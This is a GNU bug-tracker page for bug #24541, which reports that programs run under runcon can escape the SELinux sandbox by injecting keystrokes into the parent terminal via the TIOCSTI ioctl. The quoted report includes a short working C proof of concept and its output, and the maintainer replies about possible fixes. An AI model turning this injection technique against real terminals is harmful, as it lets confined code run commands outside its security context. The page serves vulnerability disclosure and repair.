GNU bug report logs -
#24541
runcon tty hijacking via TIOCSTI ioctl
Previous Next
Reported by: up201407890 <at> alunos.dcc.fc.up.pt
Date: Sun, 25 Sep 2016 15:58:02 UTC
Severity: normal
Done: Paul Eggert <eggert <at> cs.ucla.edu>
Bug is archived. No further changes may be made.
Full log
Message #14 received at 24541 <at> debbugs.gnu.org (full text, mbox):
On 25/09/16 12:39, up201407890 <at> alunos.dcc.fc.up.pt wrote:
> When executing a program via the runcon utility, the nonpriv session
> can escape to the parent session by using the TIOCSTI ioctl to push
> characters into the terminal's input buffer, allowing an attacker to
> execute arbitrary commands without the SELinux security context.
>
> $ cat test.c
> #include <unistd.h>
> #include <sys/ioctl.h>
>
> int main()
> {
> char *cmd = "id\n";
> while(*cmd)
> ioctl(0, TIOCSTI, cmd++);
> execlp("/bin/id", "id", NULL);
> }
> $ gcc test.c -o test
> $ runcon -t sandbox_t ./test
> id
> uid=1000 gid=1000 groups=1000
> context=unconfined_u:unconfined_r:sandbox_t:s0-s0:c0.c1023
> $ id <--- did not type this
> uid=1000(saken) gid=1000(saken) groups=1000(saken)
> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
>
> This issue has been recently patched in the SELinux sandbox (CVE-2016-7545):
> https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379
There are side effects to that though like not being able to background tasks etc.?
There collection of links on the issue at https://bugs.debian.org/816320
If setsid was an option, one could use `runcon ... setsid the_command`
though that would be less secure operation by default.
The same issue impacts chroot(1) somewhat also.
I'm not sure of the best fix here.
thanks,
Pádraig
This bug report was last modified 7 years and 270 days ago.
Previous Next
GNU bug tracking system
Copyright (C) 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson.